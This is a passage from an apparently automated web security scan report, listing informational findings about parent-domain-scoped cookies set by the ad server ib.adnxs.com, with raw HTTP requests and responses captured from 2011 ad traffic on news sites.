Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG3x=E:3F.0s]#%2L_'x%SEV/i#-pc>Y7H>I#QQROWd=Ko9tGwqRb7#Ggp[u5#L3UESNA125be:F-1rhfuBcd7DO/tCammG9oEGN'h61SbhmiLfk.BwWc#xxS*D.cE$X.=bC:u1N35Z>tomY?5J0hBLq-eI#9K$VvH+_$Es).Zo#(^=O)nL5r3mPCk$!8TMiNr`^q7UJ.d$V_8328U>i.r.!bbCG; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Content-Length: 43
Content-Type: image/gif
Date: Mon, 11 Apr 2011 16:21:20 GMT

GIF89a.............!.......,........@..L..;
5.72. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=541&size=728x90&inv_code=1836970&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D728x90%26section%3D1836970%26referrer%3Dhttp%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChEIiXoQChgBIAEoATD_1IztBBD_1IztBBgA; acb816160=5_[r^208WM6[kCcE/qX3b13VQ?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP6FOfHPNtdQt8f5MdWfsOnh_KqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAA_gEBAgUCAAUAAAAAgyXJcAAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12085950884050564,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd168.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12085950884050564%5EMEDIA6_DATA%5Efoo=bar; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb816160=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgBIAEoATD_1IztBAoSCNyOARAKGAEgASgBMOHnjO0EEOHnjO0EGAE.; path=/; expires=Sun, 10-Jul-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb482787=-@L6DkI/7ZKqixK%64(.-EoRh?enc=MzMzMzMzwz9SuB6F61HAPwAAAMDMzPw_UrgehetRwD8zMzMzMzPDP7ejgHZFFWJ_8f5MdWfsOnjhM6NNAAAAAMVYAwAdAgAAbAEAAAIAAACEbAIAk8AAAAEAAABVU0QAVVNEANgCWgBWHwAADAkBAgUCAAUAAAAAqSFoCgAAAAA.&tt_code=1836970&udj=uf%28%27a%27%2C+8044%2C+1302541281%29%3Buf%28%27c%27%2C+43438%2C+1302541281%29%3Buf%28%27r%27%2C+158852%2C+1302541281%29%3Bppv%288484%2C+%279178922378619560887%27%2C+1302541281%2C+1303146081%2C+43438%2C+49299%29%3Bppv%288484%2C+%279178922378619560887%27%2C+1302541281%2C+1303146081%2C+43438%2C+49299%29%3B&cnd=!FRs_xwiu0wIQhNkJGAAgk4EDKAAxMzMzMzMzwz9CEwgAEAAYACABKP7__________wFCDQikQhClvU4YOyADKAVCDQikQhCktAgYBSACKAFIA1AAWNY-YABo7AI.; path=/; expires=Tue, 12-Apr-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ; path=/; expires=Sun, 10-Jul-2011 17:01:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:01:21 GMT
Content-Length: 218

document.write('<scr'+'ipt type="text/javascript"src="http://ad.yieldmanager.com/st?anmember=541&anprice=10&ad_type=ad&ad_size=728x90&section=1836970&referrer=http://www.foxnews.com/politics/index.htm
...[SNIP]...
5.73. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=728x90&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-68330357_1302541877%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D46894%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302541877%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics?t=1302541875197&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChEIiXoQChgBIAEoATD_1IztBAoSCNyOARAKGAEgASgBMODnjO0EEODnjO0EGAE.; acb876294=-@L6DkI/7ZKqixK%64(.-(SIg?enc=MzMzMzMzwz9SuB6F61HAPwAAAMDMzPw_UrgehetRwD8zMzMzMzPDPxhpSwAC9Is_8f5MdWfsOnjgM6NNAAAAAMVYAwAdAgAAbAEAAAIAAACEbAIAk8AAAAEAAABVU0QAVVNEANgCWgBWHwAArQ8BAgUCAAUAAAAAUCHwvgAAAAA.&tt_code=1836970&udj=uf%28%27a%27%2C+8044%2C+1302541285%29%3Buf%28%27c%27%2C+43438%2C+1302541285%29%3Buf%28%27r%27%2C+158852%2C+1302541285%29%3Bppv%288484%2C+%274579021735584295192%27%2C+1302541285%2C+1303146085%2C+43438%2C+49299%29%3Bppv%288484%2C+%274579021735584295192%27%2C+1302541285%2C+1303146085%2C+43438%2C+49299%29%3B&cnd=!FRs_xwiu0wIQhNkJGAAgk4EDKAAxMzMzMzMzwz9CEwgAEAAYACABKP7__________wFCDQikQhClvU4YOyADKAVCDQikQhCktAgYBSACKAFIA1AAWNY-YABo7AI.; uuid2=8663496762294337265; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb876294=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgCIAIoAjC37IztBAoSCNyOARAKGAEgASgBMODnjO0EELfsjO0EGAI.; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb423225=5_[r^kI/7Z6[kCcE/qX3J$Oik?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP8b5nD8EI09P8f5MdWfsOng3NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAAyggBAgUCAAUAAAAAJySMDgAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488499244399858,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd141.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488499244399858%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:11:19 GMT
Content-Length: 374

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-68330357_1302541877,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=728x90;net=cm;env=i
...[SNIP]...
5.74. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302538878%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgBIAEoATCA1YztBBCA1YztBBgA; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb398454=5_[r^208WM6[kCcE/qX3bMO`R?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zPx24drqSYZEH8f5MdWfsOniAKqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAAzAgBAgUCAAUAAAAAiCTPKQAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12086094899865865,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd106.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12086094899865865%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 16:21:20 GMT
Content-Length: 493

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=
...[SNIP]...
5.75. http://ib.adnxs.com/pxj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /pxj

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pxj?bidder=18&action=setuids('369576644441445519','');&redir=http%3A%2F%2Fib.adnxs.com%2Fgetuidu%3Fhttp%3A%2F%2Fa.rfihub.com%2Fcm%3Fapxuid%3D%24UID%26forward%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre352525508247&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=8663496762294337265; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 12:35:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:35:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 12:35:34 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+MKcwNVSg=5pzOC9sG0dNO`q1.s%0ZSmbwg(RhLciH$_wXF3XdwLK.u3aCLlp@j>1hAYNN5fRn-rmn+)s$jI#-<oCZH-<fW]>8dl2O`L>m-GjsWE)wQW!g/$iN0C/R-zRMG(@QX[6sAVV2f_>.x0w4>`Ot/^cC@>9QVM'Y@6U@1+N3(; path=/; expires=Fri, 08-Jul-2011 12:35:34 GMT; domain=.adnxs.com; HttpOnly
Location: http://ib.adnxs.com/getuidu?http://a.rfihub.com/cm?apxuid=$UID&forward=
Date: Sat, 09 Apr 2011 12:35:34 GMT
Content-Length: 0

5.76. http://ib.adnxs.com/seg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=24394&t=2 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; uuid2=8663496762294337265; anj=Kfu=8fG7vhcvjr/?0P(*AuB-u**g1:XIEPGUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4p)%s#'2j@Nv$__/27.rmS[rB'*<K$BYb]33na/C]ym`Rn*-=V7[/0A'4rsA.'H#D8q)@0c8WNPV5I@^umHGB10>S4Cn+3b

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sun, 10-Apr-2011 00:18:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 00:18:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Fri, 08-Jul-2011 00:18:08 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG49EE:3F.0s]#%2L_'x%SEV/hnLCF=G#<hr/DaRTZQtI#Kto^D>7%hNCZAM!C0K<+J%%LNO`q1dAwm#D.b$Vh%:BL/)KoJY7-0rw(eDJ*n7i%aT[>CE$WT)bC:u1N35Z>tomY?5J0hBLq-eI#9K$VvH+_$Es).Zo2bVEY9yagWMy7`.O3alw<(yh; path=/; expires=Fri, 08-Jul-2011 00:18:08 GMT; domain=.adnxs.com; HttpOnly
Location: http://redcated/iaction/adoapn_AppNexusDemoActionTag_1
Date: Sat, 09 Apr 2011 00:18:08 GMT
Content-Length: 0

5.77. http://ib.adnxs.com/setuid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /setuid

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /setuid?entity=25&code=1iolb30nur9ak HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
